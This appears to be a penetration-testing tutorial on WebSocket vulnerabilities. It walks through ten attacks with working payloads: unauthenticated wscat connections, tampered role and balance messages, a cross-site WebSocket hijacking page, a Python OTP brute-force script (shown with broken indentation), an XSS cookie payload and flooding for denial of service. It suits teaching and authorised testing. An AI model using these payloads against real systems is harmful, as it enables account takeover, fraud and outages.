WebSockets provide full-duplex communication between browser and server. Unlike normal HTTP, WebSockets stay open, exchange data continuously, and bypass many traditional security layers. Because they don’t rely on standard HTTP request/response cycles, many protections such as CSRF tokens, same-origin checks, input validation layers, and WAF rules may not apply.
When developers trust WebSocket messages without strict backend validation, attackers exploit this real-time channel to manipulate logic, escalate privileges, steal data, or inject malicious frames.
How WebSockets Work
A WebSocket connection begins with an HTTP handshake:
GET /ws HTTP/1.1
Host: example.com
Upgrade: websocket
Connection: Upgrade
Origin: https://example.com
If accepted, the server switches protocols and establishes a persistent connection.
After the handshake, the browser and server exchange raw data frames:
{"action":"sendMessage","text":"hello"}
The connection remains open until one side closes it.
Because WebSockets continue running outside HTTP, attackers exploit:
-
weak origin checks
-
missing authentication
-
insecure message parsing
-
unsanitized input
-
trust in client parameters
-
missing rate limits
-
lack of state validation
Attack Surface
WebSockets introduce a large attack surface through:
-
handshake abuse
-
frame manipulation
-
client-to-server message tampering
-
server-to-client message interception
-
proxy or CDN inconsistencies
-
JSON or binary parsing errors
-
authentication bypass
-
business logic abuse
Any logic originally implemented on HTTP endpoints must be manually re-implemented in WebSockets. This commonly leads to gaps.
Practical Attack 1: Missing Authentication on WebSocket Endpoint
Many applications authenticate the HTTP site but forget to authenticate WebSockets.
Typical vulnerable handshake:
GET /chat
Upgrade: websocket
Cookies: session=xyz
If backend doesn’t validate the session during handshake, you can connect without authentication.
Practical Steps
Step 1: Use wscat or websocket-client
Install:
npm install -g wscat
Connect without cookies:
wscat -c wss://target.com/chat
Step 2: If server accepts connection
You gain unauthorized access to chat, notifications, or internal data.
Step 3: Send privileged actions
Test messages like:
{"action":"promoteUser","userId":1}
If executed → high-severity auth bypass.
Practical Attack 2: Message Tampering / Privilege Escalation
Applications often trust parameters sent over WebSockets.
Example WebSocket message:
{"action":"updateRole","role":"admin","userId":10}
If backend does not recheck authorization, attackers escalate privileges by manually crafting frames.
Practical Steps
Step 1: Connect using wscat
wscat -c wss://target.com/ws
Step 2: Send crafted messages
{"action":"setBalance","amount":99999}
or
{"action":"setRole","role":"admin"}
Step 3: Monitor response
If accepted → privilege escalation.
Practical Attack 3: Frame Injection / Message Manipulation
WebSockets accept raw frames. Attackers can inject frames containing:
-
large payloads
-
partial JSON
-
malformed fields
-
injected control sequences
If backend does not handle them safely, it leads to:
-
buffer overflows
-
parser confusion
-
business logic abuse
Practical Steps
Step 1: Capture WebSocket traffic in Burp
Use Proxy > WebSockets tab.
Step 2: Modify outgoing messages
Change fields:
{"points":100}
→
{"points":1000000}
Step 3: Send incomplete or unexpected frames
{"action":"buyItem","qty":"\u0000\u0001\u0002"}
Step 4: Evaluate error responses
Unexpected “success” responses indicate weak validation.
Practical Attack 4: WebSocket CSRF (wss:// CSRF)
Browsers automatically send cookies with WebSocket handshake just like HTTP.
If the backend does not validate the Origin header, attackers create malicious pages that open WebSocket connections on behalf of victims.
Practical Steps
Step 1: Host malicious page with:
<script>
var ws = new WebSocket("wss://target.com/ws");
ws.onopen = () => ws.send(JSON.stringify({"action":"transfer","amount":5000}));
</script>
Step 2: Trick authenticated user into visiting attacker page.
Step 3: Browser opens WebSocket with victim cookies.
If server does not validate Origin → full CSRF.
Practical Attack 5: Bypassing Rate Limits
WebSocket messages bypass HTTP traffic limiting.
Attackers can brute-force OTP, passwords, coupon codes, or keys.
Practical Steps
Step 1: Identify verification action
{"action":"verifyOTP","code":"123456"}
Step 2: Write a brute-force script
Python example:
import websocket, json
ws = websocket.WebSocket()
ws.connect("wss://target.com/ws", cookie="session=abc")
for code in range(100000, 999999):
msg = {"action":"verifyOTP","code":str(code)}
ws.send(json.dumps(msg))
Step 3: Observe which response returns success.
WebSocket brute-force is extremely fast due to no HTTP overhead.
Practical Attack 6: Sensitive Data Leakage Through Broadcast Channels
WebSockets often broadcast events to connected users.
If authentication is missing or weak, attackers join channels where they don’t belong.
Practical Steps
Step 1: Connect to WebSocket
wss://target.com/notifications
Step 2: Listen for messages
wscat
> {}
Step 3: If you receive:
-
live order updates
-
personal notifications
-
chat messages
-
internal logs
then access control is broken.
Practical Attack 7: WebSocket Hijacking
If http-only cookie flag is missing and XSS exists, attackers hijack WebSocket connections.
Practical Steps
Step 1: Inject stolen cookie into attacker’s script
Example XSS payload:
var ws = new WebSocket("wss://target.com/ws", document.cookie);
Step 2: Attacker now impersonates victim over WebSockets.
This leads to:
-
account manipulation
-
live chat impersonation
-
admin session takeover
-
arbitrary actions performed in real time
Practical Attack 8: Business Logic Manipulation via WebSockets
Complex workflows built on WebSockets often lack state enforcement.
Common manipulations:
-
paying 1 instead of full amount
-
bypassing checkout steps
-
skipping validations
-
claiming rewards repeatedly
-
modifying rates or prices
-
forcing illegal transitions
Practical Steps
Step 1: Capture message
{"action":"checkout","amount":500}
Step 2: Change amount
{"action":"checkout","amount":1}
Step 3: Force early state transitions
{"action":"confirmPayment"}
Step 4: Send out-of-order messages
Check if backend validates state properly.
Practical Attack 9: WebSocket DoS
Attackers flood the websocket with massive or malformed frames.
Practical Steps
Step 1: Send large message repeatedly
{"action":"msg","text": "A"*10000000}
Step 2: Send frames without closing
Many servers crash under stress.
Step 3: Send thousands of messages per second
WebSockets bypass rate limiting → server overload.
Practical Attack 10: Binary WebSocket Message Abuse
Some apps use binary frames for:
-
chat
-
audio
-
gaming
-
syncing states
If backend expects specific binary structures, attackers fuzz the binary format to cause:
-
logic corruption
-
buffer overflow (native extensions)
-
arbitrary memory access
Practical Steps
Use Python:
ws.send(b"\x00\xFF\x80\x01\x02\x03\x04\x05")
Observe backend behavior for crashes or unintended outputs.
Detecting WebSocket Vulnerabilities
-
inspect WebSocket handshake responses
-
check if Origin header is validated
-
send messages without authentication
-
modify fields, values, and sequences
-
send unexpected actions
-
attempt state transition bypass
-
try brute-forcing endpoints
-
attempt huge payload delivery
-
check for leaked notifications
-
check access to unauthorized broadcast channels
WebSockets are frequently overlooked and often lack server-side validation.
Intel Dump
-
WebSockets provide persistent full-duplex connections uninfluenced by normal HTTP rules.
-
Major weaknesses arise from missing authentication, missing Origin validation, and trusting client-sent fields.
-
Practical attacks include CSRF via WebSocket handshake, privilege escalation, brute-forcing, message tampering, and bypassing rate limits.
-
Tools like wscat, Burp WebSockets, Python, and fuzzers enable message injection, manipulation, and concurrent exploitation.
-
Impact includes account takeover, financial abuse, unauthorized data access, chat impersonation, and complete business logic compromise.